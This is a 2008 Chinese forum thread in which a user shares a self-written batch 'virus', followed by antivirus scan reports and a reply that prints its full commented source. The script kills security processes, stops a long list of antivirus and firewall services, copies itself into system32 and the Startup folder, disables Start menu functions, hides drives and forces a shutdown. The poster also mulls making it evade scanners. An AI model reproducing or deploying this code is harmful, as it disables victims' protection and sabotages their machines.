这两天自己写的个垃圾毒

JY-YZX714

写来玩的，是个批处理病毒。已经上报了，那个敢试试  （请在虚拟机里，因为有些恶作剧效果我也不知道怎么还原）


——————————————————————————
其实我觉得我该把前面的反杀软除掉了，这样的话就没有杀软可以查出来了

[ 本帖最后由 yzx714 于 2008-7-16 10:24 编辑 ]

sam.to

案 bingdu.rar 接收於 2008.07.15 13:02:36 (CET)
當前狀態: 正在讀取 ... 隊列中 等待中 掃瞄中 完成 未發現 停止
結果: 15/33 (45.46%)
正在讀取服務器訊息中...
您的檔案所排隊列位置: ___.
預計開始時間為 ___ 和 ___ 之間.
掃瞄完成前請勿關閉窗口.
目前針對您的檔案所進行的掃瞄進程已停止, 我們將會在稍後恢復.
如果您的等候時間超過 5 分鐘, 請重新發送檔案.
您的檔案目前正在被 VirusTotal 掃瞄中,
結果將會稍後完成時生成.
格式化文字 格式化文字
列印結果 列印結果
您的文件已過期或不存在.
目前服務已停止, 您的檔案將會稍後的未知時間內進行掃瞄 (位置: ).

您可以繼續等待回應 (自動重新整理) 或者在下面的表單內輸入您的電子郵件地址, 並按下 "獲取", 當掃瞄完成時, 系統會自動給您發送電子郵件通知.
Email:        
       
反病毒引擎         版本         最後更新         掃瞄結果
AhnLab-V3        2008.7.11.0        2008.07.15        -
AntiVir        7.8.0.64        2008.07.15        BAT/KillAV.S.6
Authentium        5.1.0.4        2008.07.15        BAT/KillAV.O
Avast        4.8.1195.0        2008.07.14        BV:KillAV-O
AVG        7.5.0.516        2008.07.15        BAT/Generic
BitDefender        7.2        2008.07.15        BAT.AVKill.J
CAT-QuickHeal        9.50        2008.07.14        BAT.KillAV.af
ClamAV        0.93.1        2008.07.15        -
DrWeb        4.44.0.09170        2008.07.15        -
eSafe        7.0.17.0        2008.07.14        -
eTrust-Vet        31.6.5956        2008.07.15        -
Ewido        4.0        2008.07.15        Trojan.KillAV.s
F-Prot        4.4.4.56        2008.07.14        BAT/KillAV.O
F-Secure        7.60.13501.0        2008.07.15        -
Fortinet        3.14.0.0        2008.07.15        -
GData        2.0.7306.1023        2008.07.15        BV:KillAV-O
Ikarus        T3.1.1.26.0        2008.07.15        Trojan.BAT.KillAV.S
Kaspersky        7.0.0.125        2008.07.15        -
McAfee        5338        2008.07.14        ProcKill-ED
Microsoft        1.3704        2008.07.15        -
NOD32v2        3268        2008.07.15        -
Norman        5.80.02        2008.07.14        -
Panda        9.0.0.4        2008.07.14        -
Prevx1        V2        2008.07.15        -
Rising        20.53.12.00        2008.07.15        Trojan.BAT.KillAV.cc
Sophos        4.31.0        2008.07.15        -
Sunbelt        3.1.1536.1        2008.07.12        -
Symantec        10        2008.07.15        Trojan.KillAV
TheHacker        6.2.96.379        2008.07.14        -
TrendMicro        8.700.0.1004        2008.07.15        BAT_KILLAV.PO
VBA32        3.12.8.0        2008.07.15        -
VirusBuster        4.5.11.0        2008.07.14        -
Webwasher-Gateway        6.6.2        2008.07.15        Script.KillAV.S.6

LZ有沒有上报到卡巴?

mailbeyond

Start of the scan: 2008年7月15日  19:25

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\bingdu.rar'
C:\Documents and Settings\Administrator\桌面\bingdu.rar
  [0] Archive type: RAR
  --> bingdu.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/KillAV.S.6
      [NOTE]      The file was deleted

hder

注释一下
@echo off   //关闭回显
title 写着玩       yzx714  我是知名人士   //设置标题
//一下为结束进程部分，可以添加自己想结束的进程名字，调用taskkill（win2000中无taskkill）来结束进程其中/im参数为进程名.f为强制结束
taskkill /im 360tray.exe /f  
taskkill /im 360safe.exe /f
taskkill /im avp.exe /f
taskkill /im avgnt.exe /f
taskkill /im mpmon.exe /f
taskkill /im EQsyssecure.exe /f
//这里以下用net stop来停止安全软件的服务
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUpdateR
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUpdate
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
//其实截至以上代码都是是停止安全软件代码，并没有真正的搞破坏，下面是搞破坏代码，
copy %0 "%windir%\system32\"           //将本文件复制到system32目录
copy %0 "%systemdrive%"                  //将自身复制到驱动目录
copy %0 "%userprofile%\「开始」菜单\程序\启动\*.*"     //将自己复制到启动文件夹中，实现开机启动
taskkill /im explorer.exe /f        //结束桌面进程
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f        //这个没有用过，但从注册表键值来看应该是取消开始菜单中的注销
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f       //这个没有用过，但从注册表键值来看应该是取消开始菜单的关机
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f       //这个没有用过，但从注册表键值来看应该是取消开始菜单的运行
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f      //这个没有用过，但从注册表键值来看应该是取消开始菜单的搜索
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t                    REG_DWORD /d 60 /f     
shutdown -s -f  // 关机
del %0 /f  //删除自己

BING126

McAfee              ProcKill-ED

JY-YZX714

4楼正解，不过倒数第二个是重启 因为有些恶作剧是重启才有效果

挪威的冬天

由于你无视了金山 金山也就无视了你 [:27:]

taihuxian

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:         http://bbs.kafan.cn/attachment.p ... a8&t=1216124147
Information:         Contains detection pattern of the batch virus BAT/KillAV.S.6


Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.64, VDF 7.0.5.117

JY-YZX714

ls用wg啊！真牛！

yclidong

-----------------------------SCAN REPORT-----------------------------
F-PROT for Windows

防病毒扫描引擎版本号: 4.4.4
病毒库: 2008-7-14, 23:42

扫描名称: [自定义扫描]
路径扫描: C:\Documents and Settings\Administrator\桌面\bingdu.rar

正常扫描
也可以扫描: 子文件夹, 压缩文件, 数据流

已开始扫描: 2008-7-15, 21:13:30
---------------------------------------------------------------------

[发现特洛伊木马：]        <BAT/KillAV.O (确切, not disinfectable)>        C:\Documents and Settings\Administrator\桌面\bingdu.rar->bingdu.bat
[包含被传染的对象]        C:\Documents and Settings\Administrator\桌面\bingdu.rar
[已隔离]        C:\Documents and Settings\Administrator\桌面\bingdu.rar->bingdu.bat

---------------------------------------------------------------------
扫描已结束:        2008-7-15, 21:13:30
用时:        0:00:00

扫描结果:

已扫描的文件:                 1
已感染的对象:         1
已清除的对象:         0
已隔离的文件:         1
---------------------------------------------------------------------